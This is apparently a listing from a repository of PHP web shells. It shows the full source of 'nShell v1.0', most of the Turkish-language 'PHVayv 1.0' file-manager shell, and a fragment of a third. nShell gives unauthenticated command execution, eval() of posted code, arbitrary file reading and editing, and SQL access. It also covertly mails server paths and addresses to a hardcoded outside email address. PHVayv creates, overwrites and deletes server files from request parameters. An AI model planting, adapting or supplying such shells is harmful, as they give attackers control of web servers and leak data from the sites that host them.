{ echo $_SERVER['PHP_SELF']."act=?<br>" ;
echo "<a href=".$_SERVER['PHP_SELF']."?act=cmd>Command</a><br>";
echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
; exit();
}
if($act=="cmd") {ecmd();}
if($act=="readfile") {readfiles();}
?>

5603
138shell/N/network.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

371
138shell/N/nshell.php.txt Normal file
View file

@ -0,0 +1,371 @@
?»?<head>
<title> nShell v1.0</title>
<style>
html { overflow-x: auto }
A: {font-weight:bold};
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
submit {
BORDER-RIGHT: buttonhighlight 2px outset;
BORDER-TOP: buttonhighlight 2px outset;
BORDER-LEFT: buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #444444;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
table {
BORDER-RIGHT: :#444444 1px outset;
BORDER-TOP: :#444444 1px outset;
BORDER-LEFT: :#444444 1px outset;
BORDER-BOTTOM: :#444444 1px outset;
BACKGROUND-COLOR: #D4D0C8;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: :#444444 1px solid;
BORDER-LEFT: :#444444 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
div,td,table {
font-family:Georgia;
}
</style>
</head>
<body bgcolor=":#444444">
<center>
<?php
error_reporting(0);
$function=passthru; // system, exec, cmd
$myname=$_SERVER['SCRIPT_NAME'];
echo "<b><font color=\"#000000\" size=\"3\" face=\"Georgia\"> System information: :</font><br>"; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
?>
<table width="80%" border="0">
<td colspan="3" align="center">
<?php
function ex($comd)
{
$res = '';
if(function_exists("system"))
{
ob_start();
system($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(function_exists("passthru"))
{
ob_start();
passthru($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(function_exists("exec"))
{
exec($comd,$res);
$res=implode("\n",$res);
}elseif(function_exists("shell_exec"))
{
$res=shell_exec($comd);
}elseif(is_resource($f=popen($comd,"r"))){
$res = "";
while(!feof($f)) { $res.=fread($f,1024); }
pclose($f);
}
return $res;
}
// safe mod
$safe_mode=@ini_get('safe_mode');
echo (($safe_mode)?("<div>Safe_mode: <b><font color=green>ON</font></b>"):("Safe_mode: <b><font color=red>OFF</font></b>"));
echo " ";
// phpversion
echo "Php version<font color=\"green\"> : ".@phpversion()."</font>";
echo " ";
// curl
$curl_on = @function_exists('curl_version');
echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
echo " ";
// mysql
echo "MYSQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo " ";
// msssql
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo " ";
// PostgreSQL
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo " ";
// Oracle
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo "<br>";
echo " ";
// Disable function
echo "Disable functions : <b>";
$df=@ini_get('disable_functions');
if(!$df){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
echo " ";
//==============xac dinh os==================
$servsoft = $_SERVER['SERVER_SOFTWARE'];
if (ereg("Win32", $servsoft)){
$sertype = "win";
}
else
{
$sertype = "nix";
}
//=========================================
$uname=ex('uname -a');
echo "<br>OS: </b><font color=blue>";
if (empty($uname)){
echo (php_uname()."</font><br><b>");
}else
echo $uname."</font><br><b>";
$id = ex('id');
$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
echo "id: </b><font color=blue>";
if (!empty($id)){
echo $id."</font><br><b>";
}else
echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
"</font><br><b>";
echo "<font color=\"black\"><a href=".$_SERVER['PHP_SELF']."?act=info target=_blank>Php Info</a></font><br></div>";
?>
</td><tr>
<td width="20%" align="center"><a href="<?=$myname?>?act=manager"> File Manager</a></td>
<td width="20%" align="center"><a href="<?=$myname?>?act=sql">Sql Query</a></td>
<td width="20%" align="center"><a href="<?=$myname?>?act=eval">Eval()</a></td><tr>
<td colspan="3" >
<?php
$act=@$_GET['act'];
if($act=="info"){
echo "<center><font color=red size=10> Php Version :".phpversion()."</font>";
phpinfo();
echo "</center>";
}
?>
<?php
//=========================================================
function perms($mode)
{
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
//===================Delect File=============================
$del=$_GET['del'];
function delfile($name)
{
passthru("del ".$name);
}
function deldir($name)
{
passthru("rmdir ".$name);
}
if($del)
{
if(is_file($del)) delfile($del); else deldir($del);
}
//==================Quan li thu muc ==========================
if($act=="manager"){
$arr = array();
$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table width=100%><tr><td align=center><b>Name</td><td align=center><b>Type</td><td align=center><b>Size</td><td align=center><b>Perms</td><td align=center>Delete</td></tr>";
foreach ($arr as $filename) {
if ($filename != "." and $filename != ".."){
if (is_dir($filename) == true){
$directory = "";
$dc=str_replace("\\","",dirname($_SERVER['PHP_SELF']));
$directory = $directory . "<tr><td align=center>$filename</td><td align=center>" .ucwords(filetype($filename)) . "</td><td></td><td align=center>" . perms(fileperms($filename))."<td align=center><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$dc.">Del</td>";
$dires = $dires . $directory;
}
if (is_file($filename) == true){
$file = "";
$link=str_replace(basename($_SERVER['REDIRECT_URL']),$filename,$_SERVER['REDIRECT_URL']);
$file = $file . "<tr><td><a href=".$link ." target=_blank>$filename</a></td><td>" .ucwords(filetype($filename)). "</td><td>" . filesize($filename) . "</td><td>" . perms(fileperms($filename))."<td><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$filename.">Del <a href=".$_SERVER['PHP_SELF']."?act=manager&file=".$filename.">Edit</a></td>";
$files = $files . $file;
}
}
}
echo $dires;
echo $files;
echo "</table><br>";
}
// view file ex: /etc/passwd
if(isset($_REQUEST['file']))
{
$file=@$_REQUEST["file"];
echo "<b>File :</b><font color=red> ". $file."</font>";
$fp=fopen($file,"r+") or die("Ban khong co quyen de ghi vao File nay , hoac do khong tim thay File");
$src=@fread($fp,filesize($file));
echo "<center><hr color=777777 width=100% height=115px><form action=".$_SERVER['REQUEST_URI']." method=post><TEXTAREA NAME=\"addtxt\" ROWS=\"5\" COLS=\"80\">".htmlspecialchars(stripslashes($src))."</TEXTAREA><br><input type=submit value=Save></form><hr color=777777 width=100% height=115px>";
$addtxt=@$_POST["addtxt"];
rewind($fp);
if($addtxt=="") @fwrite($fp,stripslashes($src)); else $rs=@fwrite($fp,stripslashes($addtxt));
if($rs==true)
{
echo "Noi dung cua file nay da duoc sua doi !<a href=".$_SERVER['REQUEST_URI'].">Xem lai</a>";
}
ftruncate($fp,ftell($fp));
echo "</center>";
}
?>
<?php
// function
function exe_u($query)
{
echo "<B><font color=green>Query # ".$query."</font></b><br>";
$result=@mysql_query($query) or die("Khong update du lieu duoc !");
if(mysql_affected_rows($result)>=0) echo "Affected rows : ".mysql_affected_rows($result)."This is Ok ! ^.^<br>";
}
function exe_c($query)
{
echo "<B><font color=green>Query # ".$query."</font></b><br>";
$result=@mysql_query($query) or die("Khong Create duoc !");
echo "This is Ok ! ^.^<br>" ;
}
function exe_d($query)
{
echo "<B><font color=green>Query # ".$query."</font></b><br>";
$result=@mysql_query($query) or die("Khong Drop duoc !");
echo "This is Ok ! ^.^<br>" ;
}
function exe_w($query)
{
echo "<b><font color=green>Query # ".$query."</font></b><br>";
$result=@mysql_query($query) or die("Khong the show gi duoc het !");
if(eregi("fields",$query)) {
while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
echo "<b><font color=red>".$row['Field']." :</font></ b> ".$row['Type'];
echo "<br>";
}
} else {
while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
while(list($key,$value)=each($row))
{
echo "<font color=red><b>".$value."</b><font>";
}
echo "<br>";
}
}
}
function exe_s($query)
{
$arrstr=@array();$i=0;
$arrstr=explode(" ",$query);
$find_field=@mysql_query("show fiedls from ".$arrstr['4']);
while($find_row=@mysql_fetch_array($find_field,MYSQL_ASSOC)){
$i++;
$arrstr[$i]=$find_row['Field'];
}
echo "<B><font color=green>Query # ".$query."</font></b><br>";
$result=@mysql_query($query) or die("Khong the select gi duoc het !");
$row=@mysql_num_rows($result);
}
function sql($string)
{
$arr=@array();
$arr=explode(";",$string);
for($i=0;$i<=count($arr);$i++)
{
$check_u=eregi("update",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]);
$check_e=eregi("use",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]);
$check_c=eregi("create",@$arr[$i]); if($check_c==true) exe_c(@$arr[$i]);
$check_d=eregi("drop",@$arr[$i]); if($check_d==true) exe_d(@$arr[$i]);
$check_w=eregi("show",@$arr[$i]); if($check_w==true) exe_w(@$arr[$i]);
$check_s=eregi("select",@$arr[$i]); if($check_s==true) exe_s(@$arr[$i]);
}
}
//=====xong phan function cho sql
// Sql query
if($act=="sql")
{
if(isset($_GET['srname'])&&isset($_GET['pass']))
{
echo $_GET['srname'];
if(!isset($_GET['srname'])) $servername=$_GET['srname'];
else $servername="localhost";
$con=@mysql_connect($servername,$_GET['uname'],$_GET['pass']) or die("Khong the connect duoc !");
$form2="<center><form method=post action=".$_SERVER['PHP_SELF']."><TEXTAREA NAME=\"str\" ROWS=\"2\" COLS=\"60\"></TEXTAREA><br><input type=submit name=s2 value=query></form></center>";
echo $form2;
$str=@$_POST['str'];
if(isset($str)) sql($str);
}
else {
echo "chao";
$form1="<center><form method=GET action='".$_SERVER['PHP_SELF']."'><table width=100% boder=0><td width=100%> User Name : <input type=text name=uname size=20> Server Name :<input name=srname type=text size=22></td><tr><td width=100%> Password :<input type=text name=pass size=20> Port : <input type=text name=port size=20><input type=submit value=login></form></td></form></table><hr color=777777 width=100% height=115px>";
echo $form1;
}
}
?>
<?php
if($act=="eval"){
$script=$_POST['script'];
if(!$script){
echo "<hr color=777777 width=100% height=115px><form action=".$_SERVER['']." method=post><TEXTAREA NAME=\"\" ROWS=\"5\" COLS=\"60\"></TEXTAREA><input type=submit value=Enter></form><hr color=777777 width=100% height=115px>";
}else{
eval($script);
}
}
?>
</td>
</table>
<font face=Webdings size=6><b>!</b></font><b><font color=\"#000000\" size=\"3\" face=\"Georgia\">nShell v1.0. Code by Navaro.</font><br><b><font color="#000000" face="Georgia">Have Fun ! {^.^} { ~.~} </font></b>
</center>
</body>

2136
138shell/N/nstview.php.txt Normal file
View file

File diff suppressed because one or more lines are too long

1012
138shell/N/ntdaddy.asp.txt Normal file
View file

File diff suppressed because it is too large Load diff

597
138shell/P/PH Vayv.php.txt Normal file
View file

@ -0,0 +1,597 @@
<? if($sistembilgisi > "") {phpinfo();} else { ?>
<?$fistik=PHVayv;?>
<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
<?if ($silklas > ""){rmdir($silklas);}?>
<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
<?if ($yenidosya == "1") {
$baglan=fopen("$dizin/$duzenx2",'w');
fwrite($baglan,$duzenx);
fclose($baglan);}
?>
<?if ($duzkaydet > "") {
$baglan=fopen($duzkaydet,'w');
fwrite($baglan,$duzenx);
fclose($baglan);}
?>
<?if ($yenklas>"") {;?>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
<font face="Verdana" style="font-size: 8pt">Dizin</font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
<td width="65">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
<tr>
<td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#9F9F9F" align="center" height="144">
<form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>"
<p align="center"><br>
<font
color="#FFFFFF" size="1" face="Arial">
<input
type="text" size="37" maxlength="32"
name="duzenx2" value="Klasör Adý"
class="search"
onblur="if (this.value == '') this.value = 'Kullanýcý'"
onfocus="if (this.value == 'Kullanýcý') this.value=''"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
<p align="center">
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Kaydet"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
&nbsp;</font></b></p>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#000000" align="center" height="19">
&nbsp;</td>
</tr>
</table>
<? } else { ?>
<?if ($yendos>"") {;
?>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
<font face="Verdana" style="font-size: 8pt">Dizin</font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
<td width="65">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
<tr>
<td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#9F9F9F" align="center" height="455">
<form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>"
<p align="center"><br>
<font
color="#FFFFFF" size="1" face="Arial">
<input
type="text" size="50" maxlength="32"
name="duzenx2" value="Dosya Adý"
class="search"
onblur="if (this.value == '') this.value = 'Kullanýcý'"
onfocus="if (this.value == 'Kullanýcý') this.value=''"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
<textarea name="duzenx"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
<br>
</font></b>
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Kaydet"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span><br>
&nbsp;</p>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#000000" align="center" height="19">
&nbsp;</td>
</tr>
</table>
<? } else { ?>
<?if ($duzenle>"") {;
?>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
<tr>
<td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
<td bgcolor="#D6D6D6" height="1">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
<tr>
<td width="1" height="19"></td>
<td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
</tr>
<tr>
<td width="1" height="1"></td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
<tr>
<td width="100%" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#9F9F9F">
<form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
<br>
<textarea name="duzenx"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
while(! feof ( $baglan ) ){
$okunan=fgets($baglan,1024);
echo $okunan;
} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
<br>
</font></b>
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Kaydet"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span></p>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#000000">
&nbsp;</td>
</tr>
</table>
<?
} else {
?>
<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>PHVayv 1.0</title>
</head>
<body topmargin="0" leftmargin="0">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
PHVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
<td width="65">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
<tr>
<td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
onmouseover='this.style.background="D9D9D9"'
onmouseout='this.style.background="9F9F9F"'
style="CURSOR: hand"
>
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
<font color="#000000">Üst Klasör</font></a></font></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
<tr>
<td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
</tr>
<tr>
<td bgcolor="#000000" height="20">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
<tr>
<td align="center" bgcolor="#5F5F5F"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
height="19" bordercolor="#000000">
<span style="font-weight: 700">
<font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
